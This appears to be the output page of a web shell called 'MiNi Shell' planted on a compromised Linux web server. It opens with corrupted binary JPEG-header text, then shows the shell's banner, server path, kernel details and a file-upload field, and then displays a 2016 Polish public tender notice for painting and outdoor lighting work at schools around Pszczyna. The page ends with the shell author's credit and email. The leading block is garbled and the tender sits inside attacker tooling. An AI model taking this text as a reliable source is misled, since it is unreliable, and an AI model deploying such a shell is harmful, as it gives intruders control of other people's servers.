JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160617/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160617/91445-N-2016.html

<p class="kh_header"><b>Pszczyna: Zadanie 1  -  Roboty malarskie w Szkole Podstawowej nr 19 w Brzeźcach przy  ul.Pokoju 2 
Zadanie 2  -  Roboty remontowo - budowlane w  Szkole Podstawowej nr 7 w Ćwiklicach 
                      przy ul. M. Oświęcimskich 71
Zadanie 3  -  Roboty malarskie w Szkole Podstawowej nr 8  w Rudołtowicach   przy ul. A. Krzywoń 5
Zadanie 4  - Roboty malarskie  w Publicznym Przedszkolu nr 7 w Pszczynie przy ul. Staromiejskiej 41
Zadanie  5 -  Zabudowa obiektów małej architektury - oświetlenie terenu w Zespole Szkolno-Przedszkolnym 
                       w Jankowicach</b><br>
<b>Numer ogłoszenia: 91445 - 2016; data zamieszczenia: 17.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pszczyński Zarząd Edukacji , ul. Zdrojowa 4 4, 43-200 Pszczyna, woj. śląskie, tel. 032 2102193 w. 116, faks 032 2102193 w. 118.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1  -  Roboty malarskie w Szkole Podstawowej nr 19 w Brzeźcach przy  ul.Pokoju 2 
Zadanie 2  -  Roboty remontowo - budowlane w  Szkole Podstawowej nr 7 w Ćwiklicach 
                      przy ul. M. Oświęcimskich 71
Zadanie 3  -  Roboty malarskie w Szkole Podstawowej nr 8  w Rudołtowicach   przy ul. A. Krzywoń 5
Zadanie 4  - Roboty malarskie  w Publicznym Przedszkolu nr 7 w Pszczynie przy ul. Staromiejskiej 41
Zadanie  5 -  Zabudowa obiektów małej architektury - oświetlenie terenu w Zespole Szkolno-Przedszkolnym 
                       w Jankowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1   - Zadanie obejmuje  malowanie wybranych pomieszczeń  w   Szkole Podstawowej nr 19 w Brzeźcach  tj:   szatni  w piwnicach budynku , sekretariatu , gabinetu dyrektora  , jadalni z  zapleczem , sal nr 4, 6, 3 , biblioteki , pomieszczenia higienistki   ,korytarza na parterze  i korytarza przy kuchni w oddziale przedszkolnym. Zadanie 2-zadanie obejmuje  remont  wybranych pomieszczeń w Szkole Podstawowej nr 7 w Ćwiklicach   tj:  sekretariatu , gabinetu dyrektora i pokoju nauczycielskiego.  Zadanie 3 -Zadanie obejmuje  malowanie wybranych pomieszczeń  w   Szkole Podstawowej nr 8w Rudołtowicach  tj:  szatni , korytarza , pomieszczenia logopedy  i salki zabaw Zadanie 4 - Zadanie obejmuje malowanie wybranych pomieszczeń tj:    szatni oraz sali zajęć na piętrze w Publicznym Przedszkolu nr 7 w Pszczynie  Zadanie 5  -  Zadanie obejmuje wykonanie oświetlenia terenu przy Zespole Szkolno Przedszkolnym w Jankowicach.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>art.67 ust. pkt 6 Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości :  
      Zadanie 1   -        400,00 zł.  ( słownie : czterysta złotych )
      Zadanie 2   -        300,00 zł.  ( słownie : trzysta  złotych )
      Zadanie 3   -        400,00 zł.  ( słownie : czterysta  złotych)
      Zadanie 4  -         200,00 zł.  ( słownie : dwieście złotych
       Zadanie 5   -       800,00 zł.  ( słownie : osiemset złotych)
      należy wnieść w terminie      01.07.2016 r.  przed upływem terminu składania ofert.
       Wadium w  formie innej niż pieniądz,  dopuszczonej art.45 ust 6  Prawa zamówień publicznych (Dz.U.2014  
        poz.1232). należy złożyć w formie oryginału  w kasie PZE, czynnej :  
                                                            w godz.    700  - 1400  ( środa i piątek )
			                 w godz.   1200  - 1400 (wtorek)
     Gwarancja zapłaty wadium winna  być  bezwarunkowa i płatna na pierwsze żądanie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja  1 pkt. za 3 lata , 5 pkt. za 4 lata , 10 pkt za 5 lat - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w przypadkach:
        -  Zmian organizacyjnych stron .
        -  Zmiany osób stron odpowiedzialnych za realizację umowy. 
        -. Wystąpienia ustawowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy
Wszystkie powyższe postanowienia stanowią katalog zmian , na które zamawiający może wyrazić zgodę. 
Wszelkie zmiany uzupełnienia niniejszej umowy wymagają zachowania formy pisemnej w postaci aneksu do              Umowy   podpisanego przez obie strony pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pze.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pszczyński Zarząd Edukacji
43-200 Pszczyna, ul. Zdrojowa 4 (woj. śląskie)
tel. (32) 210 21 93   wew.115    fax. wew. 118
pokój 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2016 godzina 11:00, miejsce: Pszczyński Zarząd Edukacji
43-200 Pszczyna, ul. Zdrojowa 4 (woj. śląskie)
tel. (32) 210 21 93   wew.115    fax. wew. 118
pokój 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1  -  Roboty malarskie w Szkole Podstawowej nr 19 w Brzeźcach przy  ul.Pokoju 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1   - Zadanie obejmuje  malowanie wybranych pomieszczeń  w   Szkole Podstawowej nr 19 w Brzeźcach  tj:   szatni  w piwnicach budynku , sekretariatu , gabinetu dyrektora  , jadalni z  zapleczem , sal nr 4, 6, 3 , biblioteki , pomieszczenia higienistki   ,korytarza na parterze  i korytarza przy kuchni w oddziale przedszkolnym w zakresie: 
- likwidacji drobnych pęknięć i skasowania zacieków  - dwukrotnego malowania ścian i sufitów farbą emulsyjną akrylową  z  przygotowaniem  i gruntowaniem  podłoża, - dwukrotnego malowania z jednokrotnym szpachlowaniem lamperii  farbą olejną , - dwukrotnego malowania  stolarki drzwiowej  - malowania rur i drobnych elementów  farbą olejną - malowanie  rur farbą olejną   Szczegółowy zakres zamówienia określają przedmiary robót i specyfikacje techniczne  wykonania i odbioru robót  budowlanych.   Zamawiający udostępnia przedmiary robót  jako pomoc dla wykonawcy przy sporządzaniu oferty.  Uwaga : Kolorystyka  malowania  do uzgodnienia  z dyrekcją szkoły.   Przed złożeniem oferty Wykonawca powinien zapoznać się z warunkami lokalizacyjno - terenowymi  i wziąć je pod uwagę przy sporządzaniu oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.07-.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja  1 pkt za 3 lata , 5 pkt. za 4 lata , 10 pkt za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2  -  Roboty remontowo - budowlane w  Szkole Podstawowej nr 7 w Ćwiklicach 
                      przy ul. M. Oświęcimskich 71.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2  Zadanie obejmuje  remont  wybranych pomieszczeń w Szkole Podstawowej nr 7 w Ćwiklicach   tj:  sekretariatu , gabinetu dyrektora i pokoju nauczycielskiego  w zakresie : - dwukrotne malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem  i gruntowaniem podłoża    - dwukrotnego malowania stolarki drzwiowej z malowaniem brudników - malowania rur i drobnych elementów metalowych 
- wymiany wykładziny rulonowej  obiektowej  z remontem podłoża,      Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych . Uwaga : Kolorystyka  malowania i wykładziny obiektowej  do uzgodnienia  z dyrekcją szkoły   Przed złożeniem oferty Wykonawca powinien zapoznać się z warunkami lokalizacyjno - terenowymi  i wziąć je pod uwagę przy sporządzaniu oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.08.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3  -  Roboty malarskie w Szkole Podstawowej nr 8  w Rudołtowicach   przy ul. A. Krzywoń 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3    Zadanie obejmuje  malowanie wybranych pomieszczeń  w   Szkole Podstawowej nr 8w Rudołtowicach  tj:  szatni , korytarza , pomieszczenia logopedy  i salki zabaw w zakresie:   -skasowania zacieków  ,  - dwukrotnego malowania ścian i sufitów farbą emulsyjną akrylową  z  przygotowaniem  i gruntowaniem  podłoża,  - dwukrotnego malowania z jednokrotnym szpachlowaniem lamperii  farbą olejną   - dwukrotnego malowania  stolarki drzwiowej 
- malowania rur i drobnych elementów  farbą olejną   - malowanie  rur farbą olejną   Szczegółowy zakres zamówienia określają przedmiary robót i specyfikacje techniczne  wykonania i odbioru robót  budowlanych.  Zamawiający udostępnia przedmiary robót  jako pomoc dla wykonawcy przy sporządzaniu oferty.  Uwaga : Kolorystyka  malowania  do uzgodnienia  z dyrekcją szkoły. Przed złożeniem oferty Wykonawca powinien zapoznać się z warunkami lokalizacyjno - terenowymi  i wziąć je pod uwagę przy sporządzaniu oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja  1 pkt za 3 lata , 5 pkt. za 4 lata , 10 pkt za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4  - Roboty malarskie  w Publicznym Przedszkolu nr 7 w Pszczynie przy ul. Staromiejskiej 41.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4  Zadanie obejmuje malowanie wybranych pomieszczeń tj:    szatni oraz sali zajęć na piętrze w Publicznym Przedszkolu nr 7 w Pszczynie   zakresie: - dwukrotnego malowania ścian i sufitów farbą emulsyjną akrylową  z  przygotowaniem   i gruntowaniem  podłoża, - dwukrotnego malowania  z jednokrotnym szpachlowaniem lamperii  farbą olejną  - malowania rur i drobnych elementów  farbą olejną- dwukrotnego malowania farbą lateksową lamperii 
- lakierowania  stolarki drzwiowej  - malowania rur i drobnych elementów  farbą olejną- malowanie  rur farbą olejną 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .  Uwaga : Kolorystyka   malowania do uzgodnienia  z dyrekcją szkoły .  Przed złożeniem oferty Wykonawca powinien zapoznać się z warunkami lokalizacyjno - terenowymi  i wziąć je pod uwagę przy sporządzaniu oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.08.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie  5 -  Zabudowa obiektów małej architektury - oświetlenie terenu w Zespole Szkolno-Przedszkolnym 
                       w Jankowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5   Zadanie obejmuje :- postawienie 5 słupów oświetleniowych typu S-40 O60 długości 4 m produkcji Rosa.    Kolor słupa czarny.   -oprawy oświetleniowe typu ELBA LED z kloszem mrożonym cylindrycznym ze źródłem światła   o mocy 43 W  ,  -na całej długości umieścić kabel w rurze ochronnej typu DVR O50. Kabel oświetlenia terenu podłączony będzie do   istniejącej instalacji zasilającej ze szkoły, -zasilanie oświetlenia wyprowadzić z istniejącego słupa oświetleniowego kablem YKYżo 5x4mm2  - pod słupy należy stosować fundamenty prefabrykowane B - 40B,- w słupach zabudować złącza bezpiecznikowe typu IZK,
- od złącza bezpiecznikowego IZK do oprawy ułożyć przewody YDYżo3x2,5mm2 dla każdej  oprawy oddzielnie,
- istniejących słupach oświetleniowych należy wymienić istniejące oprawy typu OP na oprawy ELBA LED,
- zdemontować istniejące oprawy typu OP - 9 kpl.  - słupy aluminiowe połączyć bednarką ocynkowaną FeZn 30x4 równolegle do kabla.- przed przystąpieniem do pracy należy zrealizować wykopy kontrolne .
 -po zakończeniu robót wykonawca jest zobowiązany do uporządkowania terenu po wykopach   i doprowadzeniu go do   stanu pierwotnego.- po wykonanych pracach należy wykonać inwentaryzację geodezyjną.
- powykonawczy schemat ideowy zasilania. - pomiar stanu izolacji i rezystancji uziemienia z wykonaniem protokołu. 
- pomiar natężenia z wykonaniem protokołu.  Szczegółowy zakres zadania został określony w  projekcie budowlanym oświetlenia terenu  i   przedmiarze robót . Przed złożeniem oferty Wykonawca powinien zapoznać się z warunkami lokalizacyjno - terenowymi  i wziąć je pod uwagę przy sporządzaniu oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja : 1 pkt za 3 lata , 5 pkt za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com